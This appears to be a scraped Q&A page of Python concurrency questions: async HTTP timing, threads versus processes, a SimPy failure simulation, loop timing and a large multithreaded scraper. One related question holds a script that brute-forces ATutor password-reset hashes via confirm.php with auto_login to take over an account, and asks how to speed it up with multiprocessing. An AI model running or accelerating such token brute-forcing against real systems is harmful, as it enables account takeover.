I'm trying to run a list of http get request to an url, following a trace of interarrival times between the requests (occasionally with concurrent requests at the same time).
I'm currently using asyncio and aiohttp, anyway, I have to wait a lot more than the expected time (the one defined by the list of interarrival times) because it seems that the requests are still blocking the execution.
My greatest issue is that I have also to try to get the response time for every request.
Here's the snippet of code
async def main():
iat = #list of seconds
times = {}
start_time = time.time()
url = 'http://10.250.0.12:31112/function/weather-station'
async with aiohttp.ClientSession() as session:
for i in range(len(iat)): ##iat == list of requests interarrival times
s = iat[i] / 1000
n = countlist[i]
await asyncio.sleep(s)
j = 1
t0 = time.time()
results[i] = []
elapsed[i] = []
while j <= n: ## n>1 if there are mutliple requests to be sent at the same time
async with session.get(url) as response:
r = await response.json()
tr = time.time()
results[i].append(r['direction'])
times[i].append(tr - t0)
j += 1
end_time = time.time()
print("exit, time:")
print(end_time - start_time)
asyncio.run(main())
Is it possible to achieve this thing? Am I using the wrong methods?
I'm using Python 3.7 on top of Windows 10.
Related
I have a method that iterates through a load of values and send a requests call for each. This works fine however it takes a LONG time. I want to speed this up using multiprocessing in Python3.
My question is what is the correct way to implement this using multiprocessing so I can speed up these requets?
The existing method is as so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, s.cookies, count
else:
count += 1
return False, None, count
I have tried to convert it based on the first example in the Python3 docs here however it just seems to hang when I start the script. No doubt I have implemented it wrong
def send_request(word):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, word
else:
return False
It is being called from a modified version of the original method as so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
with Pool(10) as pool:
results, word = pool.map(send_request, words)
if results:
return True, word
I'm trying to implement multithreading and multiprocessing on a sorting algorithm. The way implemented it is by:
Initialize a list of 10k items
Assign a random variable between 0-100 for each element
arr = [1] * 10000
for x, i in enumerate(arr):
arr[x] = random.randint(0, 100)
t_arr = arr
m_arr = arr
s_arr = arr
Create 2 sub-lists -- one for values lower than or equal to 50 and one for the rest
I then used bubble sort for both sub-lists in parallel. One using threads and one using processes.
Theoretically both should be faster, but only multiprocessing is. Multithreading produces the same results.
I have already tried different sorting algos, problem is persistent.
# Threading Version
start_time = time.time()
subarr1 = []
subarr2 = []
# Split Array into 2
for i in t_arr:
if i <= 50:
subarr1.append(i)
else:
subarr2.append(i)
# Sort first array
t1 = threading.Thread(target=bubbleSort, args=(subarr1,))
# Sort second array
t2 = threading.Thread(target=bubbleSort, args=(subarr2,))
t1.start()
t2.start()
t1.join()
t2.join()
end_time = time.time() - start_time
print("--- %s seconds ---" % (end_time))
# Serial Version
start_time = time.time()
subarr1 = []
subarr2 = []
# Split Array into 2
for i in s_arr:
if i <= 50:
subarr1.append(i)
else:
subarr2.append(i)
# Sort first array
bubbleSort(subarr1)
# Sort second array
bubbleSort(subarr2)
end_time = time.time() - start_time
print("--- %s seconds ---" % (end_time))
# Multiprocessing Version
start_time = time.time()
subarr1 = []
subarr2 = []
# Split Array into 2
for i in s_arr:
if i <= 50:
subarr1.append(i)
else:
subarr2.append(i)
# Sort first array
p1 = multiprocessing.Process(target=bubbleSort, args=(subarr1,))
# Sort second array
p2 = multiprocessing.Process(target=bubbleSort, args=(subarr2,))
p1.start()
p2.start()
p1.join()
p2.join()
end_time = time.time() - start_time
print("--- %s seconds ---" % (end_time))
Multithreading: around 6 seconds
Serial: around 6 seconds (similar to Threading)
Multprocessing: around 3 seconds
These results are consistent. Any advice?
Im trying to simulate two machines working, and failing at random times. When they fail they call assistance. These two machines is part of bigger system of different machines, which needs to know when its neighbor has failed to do its job.
So far, I have made the simulate of the two machines, but I cant figure out how to send messages to their neighbors without each machine needing to know the whole system?
This is what I have so far:
import simpy
import random
random_seed=42
MTTF = 3500
break_mean = 1 / MTTF
sim_time = 4 * 7*24*60 # 4 weeks 24/7
num_machines = 2
rep_time = 30
tpp = 20 #20 minutes to make each part
neighbour = 3 #How many should it send to?
#Creating a class called messaging which is an object.
class messaging(object):
#DEfing the initilizing function, and initilize self, Environment, and capacity which is set to infinity, by a simpy core-function.
def __init__(self, env, capacity=simpy.core.Infinity):
self.env = env
self.capacity = capacity
self.pipes = []
#Making a function which work on everything that is a part of the message. With name Put.
def put(self, value):
if not self.pipes: #How to get this error?
raise runtime_error('There are no output pipes.')
#Create a variable, events, store to it pipe values
events = broken_machine()
return self.env.all_of(events)
def get_output_conn(self):
#Set the capacity of pipe variable to store infinity.
pipe = simpy.Store(self.env, capacity=self.capacity)
#to each pipes, add(or append) pipe
self.pipes.append(pipe)
return pipe
def mesg_generator(number, env, out_pipe):
msg = ('Failed')
def message_reciever(name, env, in_pipe):
while True:
msg = yield in_pipe.get()
print("%s received message: %s" % (number, msg[1]))
def time_per_part():
return tpp
def ttf():
return random.expovariate(break_mean)
class Machine(object):
def __init__(self, env, number, repair):
#self.arg = arg
self.env = env
self.number = number
self.parts_made = 0
self.times_broken = 0
self.broken = False
self.process = env.process(self.working(repair))
env.process(self.broken_machine())
def working(self, repair):
while True:
work = time_per_part()
while work:
try:
begin = self.env.now
yield self.env.timeout(work)
work = 0
except simpy.Interrupt:
self.broken = True
work -= self.env.now - begin
with repair.request(priority = 1) as req:
yield req
yield self.env.timeout(rep_time)
self.times_broken +=1
yield message_reciever()
#print('Machine down')
self.broken = False #Machine fixed again
self.parts_made +=1
def broken_machine(self):
while True:
yield self.env.timeout(ttf())
if not self.broken:
self.process.interrupt()
def other_jobs(env, repair):
while True:
work = tpp
while work:
with repair.request(priority=2) as req:
yield req
try:
begin = env.now
yield env.timeout(work)
work = 0
except simpy.Interrupt:
work -= env.now - begin
print("This simulates machines 3 and 4 doing the same tasks.")
random.seed(random_seed)
env = simpy.Environment()
pipe = simpy.Store(env)
bc_pipe = messaging(env)
repair = simpy.PreemptiveResource(env, capacity = 1)
machines = [Machine(env, 'Machine %d' % i, repair)
for i in range(num_machines)]
env.process(other_jobs(env, repair))
env.run(until=sim_time)
#Show how many times each machine failed:
for machine in machines:
print("%s broke down %d times" %(machine.number, machine.times_broken))
I want to make my if statement run, only, if it is more than x seconds since it last ran. I just cant find the wey.
As you've provided no code, let's stay this is your program:
while True:
if doSomething:
print("Did it!")
We can ensure that the if statement will only run if it has been x seconds since it last ran by doing the following:
from time import time
doSomething = 1
x = 1
timeLastDidSomething = time()
while True:
if doSomething and time() - timeLastDidSomething > x:
print("Did it!")
timeLastDidSomething = time()
Hope this helps!
You'll want to use the time() method in the time module.
import time
...
old_time = time.time()
...
while (this is your game loop, presumably):
...
now = time.time()
if old_time + x <= now:
old_time = now
# only runs once every x seconds.
...
# Time in seconds
time_since_last_if = 30
time_if_ended = None
# Your loop
while your_condition:
# You still havent gone in the if, so we can only relate on our first declaration of time_since_last_if
if time_if_ended is not None:
time_since_last_if = time_if_ended - time.time()
if your_condition and time_since_last_if >= 30:
do_something()
# defining time_if_ended to keep track of the next time we'll have the if available
time_if_ended = time.time()
I am trying to scrape a huge number of URLs (approximately 3 millions) that contains JSON-formatted data in the shortest time possible. To achieve this, I have a Python code (python 3) that uses Queue, Multithreading and Urllib3. Everything works fine during the first 3 min, then the code begins to slow down, then it appears to be totally stuck. I have read everything I could find on this issue but unfortunately the solution seems to requires a knowledge which lies far beyond me.
I tried to limit the number of threads : it did not fix anything. I also tried to limit the maxsize of my queue and to change the socket timeout but it did no help either. The distant server is not blocking me nor blacklisting me, as I am able to re-launch my script any time I want with good results in the beggining (the code starts to slow down at pretty random time). Besides, sometimes my internet connection seems to be cut - as I cannot surf on any website - but this specific issue does not appear every time.
Here is my code (easy on me please, I'm a begginer):
#!/usr/bin/env python
import urllib3,json,csv
from queue import Queue
from threading import Thread
csvFile = open("X.csv", 'wt',newline="")
writer = csv.writer(csvFile,delimiter=";")
writer.writerow(('A','B','C','D'))
def do_stuff(q):
http = urllib3.connectionpool.connection_from_url('http://www.XXYX.com/',maxsize=30,timeout=20,block=True)
while True:
try:
url = q.get()
url1 = http.request('GET',url)
doc = json.loads(url1.data.decode('utf8'))
writer.writerow((doc['A'],doc['B'], doc['C'],doc['D']))
except:
print(url)
finally:
q.task_done()
q = Queue(maxsize=200)
num_threads = 15
for i in range(num_threads):
worker = Thread(target=do_stuff, args=(q,))
worker.setDaemon(True)
worker.start()
for x in range(1,3000000):
if x < 10:
url = "http://www.XXYX.com/?i=" + str(x) + "&plot=short&r=json"
elif x < 100:
url = "http://www.XXYX.com/?i=tt00000" + str(x) + "&plot=short&r=json"
elif x < 1000:
url = "http://www.XXYX.com/?i=0" + str(x) + "&plot=short&r=json"
elif x < 10000:
url = "http://www.XXYX.com/?i=00" + str(x) + "&plot=short&r=json"
elif x < 100000:
url = "http://www.XXYX.com/?i=000" + str(x) + "&plot=short&r=json"
elif x < 1000000:
url = "http://www.XXYX.com/?i=0000" + str(x) + "&plot=short&r=json"
else:
url = "http://www.XXYX.com/?i=00000" + str(x) + "&plot=short&r=json"
q.put(url)
q.join()
csvFile.close()
print("done")
As shazow said, it's not the matter of threads, but timeouts at which each thread is getting data from server. Try to include some timout in your code:
finally:
sleep(50)
q.task_done()
it also could be improved by generating adaptive timeouts, for example You could measure how much data you successfully got, and if that number decreases, increase sleep time, and vice versa